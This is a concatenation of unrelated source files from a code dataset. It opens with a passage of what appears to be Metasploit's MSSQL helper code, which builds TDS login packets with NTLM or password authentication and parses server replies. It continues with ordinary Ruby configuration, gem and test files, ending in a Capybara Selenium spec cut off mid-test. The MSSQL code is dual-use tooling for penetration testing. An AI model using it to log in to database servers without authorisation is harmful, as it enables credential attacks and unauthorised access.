0x00, # SQL Type Flags
0x00, # Reserved Flags
0x00000000, # Time Zone
0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
sname = Rex::Text.to_unicode( rhost )
dname = Rex::Text.to_unicode( db )
workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
ntlm_client = ::Net::NTLM::Client.new(
user,
pass,
workstation: workstation_name,
domain: datastore['DOMAIN'],
)
type1 = ntlm_client.init_context
# SQL 2012, at least, does not support KEY_EXCHANGE
type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
ntlmsspblob = type1.serialize
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [0, 0].pack('vv') # User length offset must be 0
pkt << [0, 0].pack('vv') # Password length offset must be 0
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv') # unused
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, 0].pack('vv') # locales
pkt << [idx, 0].pack('vv') #db
# ClientID (should be mac address)
pkt << Rex::Text.rand_text(6)
# NTLMSSP
pkt << [idx, ntlmsspblob.length].pack('vv')
idx += ntlmsspblob.length
pkt << [idx, 0].pack('vv') # AtchDBFile
pkt << cname
pkt << aname
pkt << sname
pkt << aname
pkt << ntlmsspblob
# Total packet length
pkt[0, 4] = [pkt.length].pack('V')
pkt_hdr[2] = pkt.length + 8
pkt = pkt_hdr.pack("CCnnCC") + pkt
# Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
# has a strange behavior that differs from the specifications
# upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
# is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
resp = mssql_send_recv(pkt, 15, false)
unless resp.include?("NTLMSSP")
info = {:errors => []}
mssql_parse_reply(resp, info)
mssql_print_reply(info)
return false
end
# Get default data
resp = resp[3..-1]
type3 = ntlm_client.init_context([resp].pack('m'))
type3_blob = type3.serialize
# Create an SSPIMessage
idx = 0
pkt = ''
pkt_hdr = ''
pkt_hdr = [
TYPE_SSPI_MESSAGE, #type
STATUS_END_OF_MESSAGE, #status
0x0000, #length
0x0000, # SPID
0x01, # PacketID
0x00 #Window
]
pkt_hdr[2] = type3_blob.length + 8
pkt = pkt_hdr.pack("CCnnCC") + type3_blob
resp = mssql_send_recv(pkt)
#SQL Server Authentification
else
idx = 0
pkt = ''
pkt << [
0x00000000, # Dummy size
0x71000001, # TDS Version
0x00000000, # Size
0x00000007, # Version
rand(1024+1), # PID
0x00000000, # ConnectionID
0xe0, # Option Flags 1
0x03, # Option Flags 2
0x00, # SQL Type Flags
0x00, # Reserved Flags
0x00000000, # Time Zone
0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( user )
pname = mssql_tds_encrypt( pass )
aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( rhost )
dname = Rex::Text.to_unicode( db )
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [idx, uname.length / 2].pack('vv')
idx += uname.length
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv')
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
pkt << [idx, 0].pack('vv')
pkt << [idx, dname.length / 2].pack('vv')
idx += dname.length
# The total length has to be embedded twice more here
pkt << [
0,
0,
0x12345678,
0x12345678
].pack('vVVV')
pkt << cname
pkt << uname
pkt << pname
pkt << aname
pkt << sname
pkt << aname
pkt << dname
# Total packet length
pkt[0, 4] = [pkt.length].pack('V')
# Embedded packet lengths
pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2
# Packet header and total length including header
pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
begin
resp = mssql_send_recv(pkt)
rescue EOFError
print_error('Probable server or network failure')
return false
end
end
info = {:errors => []}
info = mssql_parse_reply(resp, info)
return false if not info
info[:login_ack] ? true : false
end
#
# Login to the SQL server using the standard USERNAME/PASSWORD options
#
def mssql_login_datastore(db='')
mssql_login(datastore['USERNAME'], datastore['PASSWORD'], db)
end
#
# Issue a SQL query using the TDS protocol
#
def mssql_query(sqla, doprint=false, opts={})
info = { :sql => sqla }
opts[:timeout] ||= 15
pkts = []
idx = 0
bsize = 4096 - 8
chan = 0
@cnt ||= 0
@cnt += 1
sql = Rex::Text.to_unicode(sqla)
while(idx < sql.length)
buf = sql[idx, bsize]
flg = buf.length < bsize ? "\x01" : "\x00"
pkts << "\x01" + flg + [buf.length + 8].pack('n') + [chan].pack('n') + [@cnt].pack('C') + "\x00" + buf
idx += bsize
end
resp = mssql_send_recv(pkts.join, opts[:timeout])
mssql_parse_reply(resp, info)
mssql_print_reply(info) if doprint
info
end
#
# Nicely print the results of a SQL query
#
def mssql_print_reply(info)
print_status("SQL Query: #{info[:sql]}")
if info[:done] && info[:done][:rows].to_i > 0
print_status("Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})")
end
if info[:errors] && !info[:errors].empty?
info[:errors].each do |err|
print_error(err)
end
end
if info[:rows] && !info[:rows].empty?
tbl = Rex::Text::Table.new(
'Indent' => 1,
'Header' => "",
'Columns' => info[:colnames],
'SortIndex' => -1
)
info[:rows].each do |row|
tbl << row
end
print_line(tbl.to_s)
end
end
#
# Parse a raw TDS reply from the server
#
def mssql_parse_tds_reply(data, info)
info[:errors] ||= []
info[:colinfos] ||= []
info[:colnames] ||= []
# Parse out the columns
cols = data.slice!(0, 2).unpack('v')[0]
0.upto(cols-1) do |col_idx|
col = {}
info[:colinfos][col_idx] = col
col[:utype] = data.slice!(0, 2).unpack('v')[0]
col[:flags] = data.slice!(0, 2).unpack('v')[0]
col[:type] = data.slice!(0, 1).unpack('C')[0]
case col[:type]
when 48
col[:id] = :tinyint
when 52
col[:id] = :smallint
when 56
col[:id] = :rawint
when 61
col[:id] = :datetime
when 34
col[:id] = :image
col[:max_size] = data.slice!(0, 4).unpack('V')[0]
col[:value_length] = data.slice!(0, 2).unpack('v')[0]
col[:value] = data.slice!(0, col[:value_length] * 2).gsub("\x00", '')
when 36
col[:id] = :string
when 38
col[:id] = :int
col[:int_size] = data.slice!(0, 1).unpack('C')[0]
when 127
col[:id] = :bigint
when 165
col[:id] = :hex
col[:max_size] = data.slice!(0, 2).unpack('v')[0]
when 173
col[:id] = :hex # binary(2)
col[:max_size] = data.slice!(0, 2).unpack('v')[0]
when 231, 175, 167, 239
col[:id] = :string
col[:max_size] = data.slice!(0, 2).unpack('v')[0]
col[:codepage] = data.slice!(0, 2).unpack('v')[0]
col[:cflags] = data.slice!(0, 2).unpack('v')[0]
col[:charset_id] = data.slice!(0, 1).unpack('C')[0]
else
col[:id] = :unknown
end
col[:msg_len] = data.slice!(0, 1).unpack('C')[0]
if col[:msg_len] && col[:msg_len] > 0
col[:name] = data.slice!(0, col[:msg_len] * 2).gsub("\x00", '')
end
info[:colnames] << (col[:name] || 'NULL')
end
end
#
# Parse individual tokens from a TDS reply
#
def mssql_parse_reply(data, info)
info[:errors] = []
return if not data
until data.empty?
token = data.slice!(0, 1).unpack('C')[0]
case token
when 0x81
mssql_parse_tds_reply(data, info)
when 0xd1
mssql_parse_tds_row(data, info)
when 0xe3
mssql_parse_env(data, info)
when 0x79
mssql_parse_ret(data, info)
when 0xfd, 0xfe, 0xff
mssql_parse_done(data, info)
when 0xad
mssql_parse_login_ack(data, info)
when 0xab
mssql_parse_info(data, info)
when 0xaa
mssql_parse_error(data, info)
when nil
break
else
info[:errors] << "unsupported token: #{token}"
end
end
info
end
#
# Parse a single row of a TDS reply
#
def mssql_parse_tds_row(data, info)
info[:rows] ||= []
row = []
info[:colinfos].each do |col|
if(data.length == 0)
row << "<EMPTY>"
next
end
case col[:id]
when :hex
str = ""
len = data.slice!(0, 2).unpack('v')[0]
if len > 0 && len < 65535
str << data.slice!(0, len)
end
row << str.unpack("H*")[0]
when :string
str = ""
len = data.slice!(0, 2).unpack('v')[0]
if len > 0 && len < 65535
str << data.slice!(0, len)
end
row << str.gsub("\x00", '')
when :datetime
row << data.slice!(0, 8).unpack("H*")[0]
when :rawint
row << data.slice!(0, 4).unpack('V')[0]
when :bigint
row << data.slice!(0, 8).unpack("H*")[0]
when :smallint
row << data.slice!(0, 2).unpack("v")[0]
when :smallint3
row << [data.slice!(0, 3)].pack("Z4").unpack("V")[0]
when :tinyint
row << data.slice!(0, 1).unpack("C")[0]
when :image
str = ''
len = data.slice!(0, 1).unpack('C')[0]
str = data.slice!(0, len) if len && len > 0
row << str.unpack("H*")[0]
when :int
len = data.slice!(0, 1).unpack("C")[0]
raw = data.slice!(0, len) if len && len > 0
case len
when 0, 255
row << ''
when 1
row << raw.unpack("C")[0]
when 2
row << raw.unpack('v')[0]
when 4
row << raw.unpack('V')[0]
when 5
row << raw.unpack('V')[0] # XXX: missing high byte
when 8
row << raw.unpack('VV')[0] # XXX: missing high dword
else
info[:errors] << "invalid integer size: #{len} #{data[0, 16].unpack("H*")[0]}"
end
else
info[:errors] << "unknown column type: #{col.inspect}"
end
end
info[:rows] << row
info
end
#
# Parse a "ret" TDS token
#
def mssql_parse_ret(data, info)
ret = data.slice!(0, 4).unpack('N')[0]
info[:ret] = ret
info
end
#
# Parse a "done" TDS token
#
def mssql_parse_done(data, info)
status, cmd, rows = data.slice!(0, 8).unpack('vvV')
info[:done] = { :status => status, :cmd => cmd, :rows => rows }
info
end
#
# Parse an "error" TDS token
#
def mssql_parse_error(data, info)
len = data.slice!(0, 2).unpack('v')[0]
buff = data.slice!(0, len)
errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
emsg = buff.slice!(0, elen * 2)
emsg.gsub!("\x00", '')
info[:errors] << "SQL Server Error ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
info
end
#
# Parse an "environment change" TDS token
#
def mssql_parse_env(data, info)
len = data.slice!(0, 2).unpack('v')[0]
buff = data.slice!(0, len)
type = buff.slice!(0, 1).unpack('C')[0]
nval = ''
nlen = buff.slice!(0, 1).unpack('C')[0] || 0
nval = buff.slice!(0, nlen * 2).gsub("\x00", '') if nlen > 0
oval = ''
olen = buff.slice!(0, 1).unpack('C')[0] || 0
oval = buff.slice!(0, olen * 2).gsub("\x00", '') if olen > 0
info[:envs] ||= []
info[:envs] << { :type => type, :old => oval, :new => nval }
info
end
#
# Parse an "information" TDS token
#
def mssql_parse_info(data, info)
len = data.slice!(0, 2).unpack('v')[0]
buff = data.slice!(0, len)
errno, state, sev, elen = buff.slice!(0, 8).unpack('VCCv')
emsg = buff.slice!(0, elen * 2)
emsg.gsub!("\x00", '')
info[:infos] ||= []
info[:infos] << "SQL Server Info ##{errno} (State:#{state} Severity:#{sev}): #{emsg}"
info
end
#
# Parse a "login ack" TDS token
#
def mssql_parse_login_ack(data, info)
len = data.slice!(0, 2).unpack('v')[0]
_buff = data.slice!(0, len)
info[:login_ack] = true
end
end
end
| 27.395397 | 319 | 0.571554 |
f7872f07ab690486deb54b3fb2abaa7101272883 | 2,530 | # frozen_string_literal: true
require 'common/client/configuration/rest'
require 'common/client/middleware/request/camelcase'
require 'common/client/middleware/response/json_parser'
require 'common/client/middleware/response/raise_error'
require 'common/client/middleware/response/mhv_errors'
require 'common/client/middleware/response/snakecase'
require 'common/client/middleware/response/mhv_xml_html_errors'
require 'rx/middleware/response/rx_parser'
require 'rx/middleware/response/rx_failed_station'
require 'typhoeus'
require 'typhoeus/adapters/faraday'
module Rx
# Configuration class used to setup the environment used by client
class Configuration < Common::Client::Configuration::REST
def app_token
Settings.mhv.rx.app_token
end
def base_path
"#{Settings.mhv.rx.host}/mhv-api/patient/v1/"
end
def caching_enabled?
Settings.mhv.rx.collection_caching_enabled || false
end
def service_name
'Rx'
end
def connection
Faraday.new(base_path, headers: base_request_headers, request: request_options) do |conn|
conn.use :breakers
conn.request :json
# Uncomment this if you want curl command equivalent or response output to log
# conn.request(:curl, ::Logger.new(STDOUT), :warn) unless Rails.env.production?
# conn.response(:logger, ::Logger.new(STDOUT), bodies: true) unless Rails.env.production?
conn.response :betamocks if Settings.mhv.rx.mock
conn.response :rx_failed_station
conn.response :rx_parser
conn.response :snakecase
conn.response :raise_error, error_prefix: service_name
conn.response :mhv_errors
conn.response :mhv_xml_html_errors
conn.response :json_parser
conn.adapter Faraday.default_adapter
end
end
def parallel_connection
Faraday.new(base_path, headers: base_request_headers, request: request_options) do |conn|
conn.use :breakers
conn.request :camelcase
conn.request :json
# Uncomment this if you want curl command equivalent or response output to log
# conn.request(:curl, ::Logger.new(STDOUT), :warn) unless Rails.env.production?
# conn.response(:logger, ::Logger.new(STDOUT), bodies: true) unless Rails.env.production?
conn.response :snakecase
conn.response :raise_error, error_prefix: service_name
conn.response :mhv_errors
conn.response :json_parser
conn.adapter :typhoeus
end
end
end
end
| 33.289474 | 97 | 0.716601 |
f834b96bb919420a805f3662f6712e3fc5d3826a | 2,456 | require File.expand_path('../../fixtures/constants', __FILE__)
module ConstantSpecs
end
describe "Module#const_set" do
it "sets the constant specified by a String or Symbol to the given value" do
ConstantSpecs.const_set :CS_CONST401, :const401
ConstantSpecs::CS_CONST401.should == :const401
ConstantSpecs.const_set "CS_CONST402", :const402
ConstantSpecs.const_get(:CS_CONST402).should == :const402
end
it "returns the value set" do
ConstantSpecs.const_set(:CS_CONST403, :const403).should == :const403
end
# PENDING: needs proper parser implementation
#
# it "sets the name of an anonymous module" do
# m = Module.new
# ConstantSpecs.const_set(:CS_CONST1000, m)
# m.name.should == "ConstantSpecs::CS_CONST1000"
# end
it "raises a NameError if the name does not start with a capital letter" do
lambda { ConstantSpecs.const_set "name", 1 }.should raise_error(NameError)
end
it "raises a NameError if the name starts with a non-alphabetic character" do
lambda { ConstantSpecs.const_set "__CONSTX__", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "@Name", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "!Name", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "::Name", 1 }.should raise_error(NameError)
end
it "raises a NameError if the name contains non-word characters" do
# underscore (i.e., _) is a valid word character
ConstantSpecs.const_set("CS_CONST404", :const404).should == :const404
lambda { ConstantSpecs.const_set "Name=", 1 }.should raise_error(NameError)
lambda { ConstantSpecs.const_set "Name?", 1 }.should raise_error(NameError)
end
# PENDING: should_receive isn't available on opal-spec
#
# it "calls #to_str to convert the given name to a String" do
#
# name = mock("CS_CONST405")
# name.should_receive(:to_str).and_return("CS_CONST405")
# ConstantSpecs.const_set(name, :const405).should == :const405
# ConstantSpecs::CS_CONST405.should == :const405
# end
# PENDING: should_receive isn't available on opal-spec
#
# it "raises a TypeError if conversion to a String by calling #to_str fails" do
# name = mock('123')
# lambda { ConstantSpecs.const_set name, 1 }.should raise_error(TypeError)
#
# name.should_receive(:to_str).and_return(123)
# lambda { ConstantSpecs.const_set name, 1 }.should raise_error(TypeError)
# end
end
| 37.784615 | 84 | 0.721091 |
91d920fb62c01056379ea5529f7940dd8b3c35f6 | 163 | # frozen_string_literal: true
require 'test_helper'
class NavigationTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
| 16.3 | 54 | 0.742331 |
62aa0a1046562795966f3b314f1b5af52a368070 | 993 | require "http"
require "noticed/engine"
module Noticed
autoload :Base, "noticed/base"
autoload :Coder, "noticed/coder"
autoload :Translation, "noticed/translation"
module DeliveryMethods
autoload :Base, "noticed/delivery_methods/base"
autoload :ActionCable, "noticed/delivery_methods/action_cable"
autoload :Database, "noticed/delivery_methods/database"
autoload :Email, "noticed/delivery_methods/email"
autoload :Slack, "noticed/delivery_methods/slack"
autoload :Test, "noticed/delivery_methods/test"
autoload :Twilio, "noticed/delivery_methods/twilio"
autoload :Vonage, "noticed/delivery_methods/vonage"
end
def self.notify(recipients:, notification:)
recipients.each do |recipient|
notification.notify(recipient)
end
# Clear the recipient after sending to the group
notification.recipient = nil
end
mattr_accessor :parent_class
@@parent_class = "ApplicationJob"
class ValidationError < StandardError
end
end
| 28.371429 | 66 | 0.752266 |
e2241dfd6b91466af500560a93d309efbaffcf08 | 955 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'mina/oblako/version'
Gem::Specification.new do |spec|
spec.name = 'mina-oblako'
spec.version = Mina::Oblako::VERSION
spec.authors = ['gydroperit']
spec.email = ['gydroperit@gmail.com']
spec.summary = %(Mina extended configurator.)
spec.description = %(Configuration and managements Mina tasks for Nginx + Puma.)
spec.homepage = 'https://github.com/gydroperit/mina-oblako.git'
spec.license = 'MIT'
spec.files = `git ls-files`.split($RS)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_dependency 'mina', '~> 1'
spec.add_development_dependency 'bundler', '~> 1.5'
spec.add_development_dependency 'rake', '~> 0'
end
| 36.730769 | 84 | 0.652356 |
6153928303a24270c2a82468c48be05c4e48e927 | 1,078 | # -*- coding: utf-8 -*-
require 'helper'
class TestBreaks02 < Test::Unit::TestCase
def setup
setup_dir_var
end
def teardown
File.delete(@xlsx) if File.exist?(@xlsx)
end
def test_page_breaks02
@xlsx = 'page_breaks02.xlsx'
workbook = WriteXLSX.new(@xlsx)
worksheet = workbook.add_worksheet
worksheet.set_h_pagebreaks(15, 7, 3, 0)
worksheet.write('A1', 'Foo')
workbook.close
compare_xlsx_for_regression(
File.join(@regression_output, @xlsx),
@xlsx,
[
'xl/printerSettings/printerSettings1.bin',
'xl/worksheets/_rels/sheet1.xml.rels'
],
{
'[Content_Types].xml' => ['<Default Extension="bin"'],
'xl/worksheets/sheet1.xml' => ['<pageMargins', '<pageSetup']
}
)
end
end
| 29.135135 | 93 | 0.453618 |
ff0882dfcb4cc9ca5f7b27f34980f6f00d3cf362 | 21,531 | # frozen_string_literal: true
require 'spec_helper'
require 'selenium-webdriver'
RSpec.shared_examples 'Capybara::Session' do |session, mode|
let(:session) { session }
context 'with selenium driver' do
describe '#driver' do
it 'should be a selenium driver' do
expect(session.driver).to be_an_instance_of(Capybara::Selenium::Driver)
end
end
describe '#mode' do
it 'should remember the mode' do
expect(session.mode).to eq(mode)
end
end
describe '#reset!' do
it 'freshly reset session should not be touched' do
session.instance_variable_set(:@touched, true)
session.reset!
expect(session.instance_variable_get(:@touched)).to eq false
end
end
describe 'exit codes' do
let(:env) { { 'SELENIUM_BROWSER' => session.driver.options[:browser].to_s } }
let!(:orig_dir) { Dir.getwd }
before do
Dir.chdir(File.join(File.dirname(__FILE__), '..'))
end
after do
Dir.chdir(orig_dir)
end
it 'should have return code 1 when running selenium_driver_rspec_failure.rb' do
skip 'only setup for local non-headless' if headless_or_remote?
skip 'Not setup for edge' if edge?(session)
system(env, 'rspec spec/fixtures/selenium_driver_rspec_failure.rb', out: File::NULL, err: File::NULL)
expect($CHILD_STATUS.exitstatus).to eq(1)
end
it 'should have return code 0 when running selenium_driver_rspec_success.rb' do
skip 'only setup for local non-headless' if headless_or_remote?
skip 'Not setup for edge' if edge?(session)
system(env, 'rspec spec/fixtures/selenium_driver_rspec_success.rb', out: File::NULL, err: File::NULL)
expect($CHILD_STATUS.exitstatus).to eq(0)
end
end
describe '#accept_alert', requires: [:modals] do
it 'supports a blockless mode' do
session.visit('/with_js')
session.click_link('Open alert')
session.accept_alert
expect { session.driver.browser.switch_to.alert }.to raise_error(session.driver.send(:modal_error))
end
it 'can be called before visiting' do
session.accept_alert 'Initial alert' do
session.visit('/initial_alert')
end
expect(session).to have_text('Initial alert page')
end
end
describe '#fill_in_with empty string and no options' do
it 'should trigger change when clearing a field' do
pending "safaridriver doesn't trigger change for clear" if safari?(session)
session.visit('/with_js')
session.fill_in('with_change_event', with: '')
# click outside the field to trigger the change event
session.find(:css, 'body').click
expect(session).to have_selector(:css, '.change_event_triggered', match: :one)
end
end
describe '#fill_in with { :clear => :backspace } fill_option', requires: [:js] do
before do
# Firefox has an issue with change events if the main window doesn't think it's focused
session.execute_script('window.focus()')
end
it 'should fill in a field, replacing an existing value' do
session.visit('/form')
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: :backspace })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('Harry')
end
it 'should fill in a field, replacing an existing value, even with caret position' do
session.visit('/form')
session.find(:css, '#form_first_name').execute_script <<-JS
this.focus();
this.setSelectionRange(0, 0);
JS
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: :backspace })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('Harry')
end
it 'should fill in if the option is set via global option' do
Capybara.default_set_options = { clear: :backspace }
session.visit('/form')
session.fill_in('form_first_name', with: 'Thomas')
expect(session.find(:fillable_field, 'form_first_name').value).to eq('Thomas')
end
it 'should only trigger onchange once' do
session.visit('/with_js')
sleep 2 if safari?(session) # Safari needs a delay (to load event handlers maybe ???)
session.fill_in('with_change_event',
with: 'some value',
fill_options: { clear: :backspace })
# click outside the field to trigger the change event
session.find(:css, '#with_focus_event').click
expect(session.find(:css, '.change_event_triggered', match: :one, wait: 5)).to have_text 'some value'
end
it 'should trigger change when clearing field' do
session.visit('/with_js')
session.fill_in('with_change_event',
with: '',
fill_options: { clear: :backspace })
# click outside the field to trigger the change event
session.find(:css, '#with_focus_event').click
expect(session).to have_selector(:css, '.change_event_triggered', match: :one, wait: 5)
end
it 'should trigger input event field_value.length times' do
session.visit('/with_js')
session.fill_in('with_change_event',
with: '',
fill_options: { clear: :backspace })
# click outside the field to trigger the change event
# session.find(:css, 'body').click
session.find(:css, 'h1', text: 'FooBar').click
expect(session).to have_xpath('//p[@class="input_event_triggered"]', count: 13)
end
end
describe '#fill_in with { clear: :none } fill_options' do
it 'should append to content in a field' do
pending 'Safari overwrites by default - need to figure out a workaround' if safari?(session)
session.visit('/form')
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: :none })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('JohnHarry')
end
it 'works with rapid fill' do
pending 'Safari overwrites by default - need to figure out a workaround' if safari?(session)
long_string = (0...60).map { |i| ((i % 26) + 65).chr }.join
session.visit('/form')
session.fill_in('form_first_name', with: long_string, fill_options: { clear: :none })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('John' + long_string)
end
end
describe '#fill_in with Date' do
before do
session.visit('/form')
session.find(:css, '#form_date').execute_script <<-JS
window.capybara_formDateFiredEvents = [];
var fd = this;
['focus', 'input', 'change'].forEach(function(eventType) {
fd.addEventListener(eventType, function() { window.capybara_formDateFiredEvents.push(eventType); });
});
JS
# work around weird FF issue where it would create an extra focus issue in some cases
session.find(:css, 'h1', text: 'Form').click
# session.find(:css, 'body').click
end
it 'should generate standard events on changing value' do
pending "IE 11 doesn't support date input type" if ie?(session)
pending "Safari doesn't support date input type" if safari?(session)
session.fill_in('form_date', with: Date.today)
expect(session.evaluate_script('window.capybara_formDateFiredEvents')).to eq %w[focus input change]
end
it 'should not generate input and change events if the value is not changed' do
pending "IE 11 doesn't support date input type" if ie?(session)
pending "Safari doesn't support date input type" if safari?(session)
session.fill_in('form_date', with: Date.today)
session.fill_in('form_date', with: Date.today)
# Chrome adds an extra focus for some reason - ok for now
expect(session.evaluate_script('window.capybara_formDateFiredEvents')).to eq(%w[focus input change])
end
end
describe '#fill_in with { clear: Array } fill_options' do
it 'should pass the array through to the element' do
# this is mainly for use with [[:control, 'a'], :backspace] - however since that is platform dependant I'm testing with something less useful
session.visit('/form')
session.fill_in('form_first_name',
with: 'Harry',
fill_options: { clear: [[:shift, 'abc'], :backspace] })
expect(session.find(:fillable_field, 'form_first_name').value).to eq('JohnABHarry')
end
end
describe '#fill_in with Emoji' do
it 'sends emojis' do
session.visit('/form')
session.fill_in('form_first_name', with: 'a๐cd๐ด ๐๐ฝ๐ต๐น e๐คพ๐ฝโโ๏ธf')
expect(session.find(:fillable_field, 'form_first_name').value).to eq('a๐cd๐ด ๐๐ฝ๐ต๐น e๐คพ๐ฝโโ๏ธf')
end
end
describe '#path' do
it 'returns xpath' do
# this is here because it is testing for an XPath that is specific to the algorithm used in the selenium driver
session.visit('/path')
element = session.find(:link, 'Second Link')
expect(element.path).to eq('/HTML/BODY[1]/DIV[2]/A[1]')
end
it 'handles namespaces in xhtml' do
pending "IE 11 doesn't handle all XPath querys (namespace-uri, etc)" if ie?(session)
session.visit '/with_namespace'
rect = session.find(:css, 'div svg rect:first-of-type')
expect(rect.path).to eq("/HTML/BODY[1]/DIV[1]/*[local-name()='svg' and namespace-uri()='http://www.w3.org/2000/svg'][1]/*[local-name()='rect' and namespace-uri()='http://www.w3.org/2000/svg'][1]")
expect(session.find(:xpath, rect.path)).to eq rect
end
it 'handles default namespaces in html5' do
pending "IE 11 doesn't handle all XPath querys (namespace-uri, etc)" if ie?(session)
session.visit '/with_html5_svg'
rect = session.find(:css, 'div svg rect:first-of-type')
expect(rect.path).to eq("/HTML/BODY[1]/DIV[1]/*[local-name()='svg' and namespace-uri()='http://www.w3.org/2000/svg'][1]/*[local-name()='rect' and namespace-uri()='http://www.w3.org/2000/svg'][1]")
expect(session.find(:xpath, rect.path)).to eq rect
end
it 'handles case sensitive element names' do
pending "IE 11 doesn't handle all XPath querys (namespace-uri, etc)" if ie?(session)
session.visit '/with_namespace'
els = session.all(:css, 'div *', visible: :all)
expect { els.map(&:path) }.not_to raise_error
lg = session.find(:css, 'div linearGradient', visible: :all)
expect(session.find(:xpath, lg.path, visible: :all)).to eq lg
end
end
describe 'all with disappearing elements' do
it 'ignores stale elements in results' do
session.visit('/path')
elements = session.all(:link) { |_node| raise Selenium::WebDriver::Error::StaleElementReferenceError }
expect(elements.size).to eq 0
end
end
describe '#evaluate_script' do
it 'can return an element' do
session.visit('/form')
element = session.evaluate_script("document.getElementById('form_title')")
expect(element).to eq session.find(:id, 'form_title')
end
it 'can return arrays of nested elements' do
session.visit('/form')
elements = session.evaluate_script('document.querySelectorAll("#form_city option")')
expect(elements).to all(be_instance_of Capybara::Node::Element)
expect(elements).to eq session.find(:css, '#form_city').all(:css, 'option').to_a
end
it 'can return hashes with elements' do
session.visit('/form')
result = session.evaluate_script("{ a: document.getElementById('form_title'), b: {c: document.querySelectorAll('#form_city option')}}")
expect(result).to eq(
'a' => session.find(:id, 'form_title'),
'b' => {
'c' => session.find(:css, '#form_city').all(:css, 'option').to_a
}
)
end
describe '#evaluate_async_script' do
it 'will timeout if the script takes too long' do
skip 'safaridriver returns the wrong error type' if safari?(session)
session.visit('/with_js')
expect do
session.using_wait_time(1) do
session.evaluate_async_script('var cb = arguments[0]; setTimeout(function(){ cb(null) }, 3000)')
end
end.to raise_error Selenium::WebDriver::Error::ScriptTimeoutError
end
end
end
describe 'Element#inspect' do
it 'outputs obsolete elements' do
session.visit('/form')
el = session.find(:button, 'Click me!').click
expect(session).to have_no_button('Click me!')
allow(el).to receive(:synchronize)
expect(el.inspect).to eq 'Obsolete #<Capybara::Node::Element>'
expect(el).not_to have_received(:synchronize)
end
end
describe 'Element#click' do
it 'should handle fixed headers/footers' do
session.visit('/with_fixed_header_footer')
session.using_wait_time(2) do
session.find(:link, 'Go to root').click
end
expect(session).to have_current_path('/')
end
end
describe 'Capybara#Node#attach_file' do
it 'can attach a directory' do
pending "Geckodriver doesn't support uploading a directory" if firefox?(session)
pending "Selenium remote doesn't support transferring a directory" if remote?(session)
pending "Headless Chrome doesn't support directory upload - https://bugs.chromium.org/p/chromedriver/issues/detail?id=2521&q=directory%20upload&colspec=ID%20Status%20Pri%20Owner%20Summary" if chrome?(session) && ENV['HEADLESS']
pending "IE doesn't support uploading a directory" if ie?(session)
pending 'Chrome/chromedriver 73 breaks this' if chrome?(session) && chrome_gte?(73, session) && chrome_lt?(75, session)
pending "Safari doesn't support uploading a directory" if safari?(session)
# pending "Edge/msedgedriver doesn't support directory upload" if edge?(session) && edge_gte?(75, session)
session.visit('/form')
test_file_dir = File.expand_path('./fixtures', File.dirname(__FILE__))
session.attach_file('Directory Upload', test_file_dir)
session.click_button('Upload Multiple')
expect(session.body).to include('5 | ') # number of files
end
it 'can attach a relative file' do
pending 'Geckdoriver on windows requires alternate file separator which path expansion replaces' if Gem.win_platform? && firefox?(session)
session.visit('/form')
session.attach_file('Single Document', 'spec/fixtures/capybara.csv')
session.click_button('Upload Single')
expect(session.body).to include('Content-type: text/csv')
end
end
context 'Windows' do
it "can't close the primary window" do
expect do
session.current_window.close
end.to raise_error(ArgumentError, 'Not allowed to close the primary window')
end
end
# rubocop:disable RSpec/InstanceVariable
describe 'Capybara#disable_animation' do
context 'when set to `true`' do
before(:context) do # rubocop:disable RSpec/BeforeAfterAll
skip "Safari doesn't support multiple sessions" if safari?(session)
# NOTE: Although Capybara.SpecHelper.reset! sets Capybara.disable_animation to false,
# it doesn't affect any of these tests because the settings are applied per-session
Capybara.disable_animation = true
@animation_session = Capybara::Session.new(session.mode, TestApp.new)
end
it 'should disable CSS transitions' do
@animation_session.visit('with_animation')
@animation_session.click_link('transition me away')
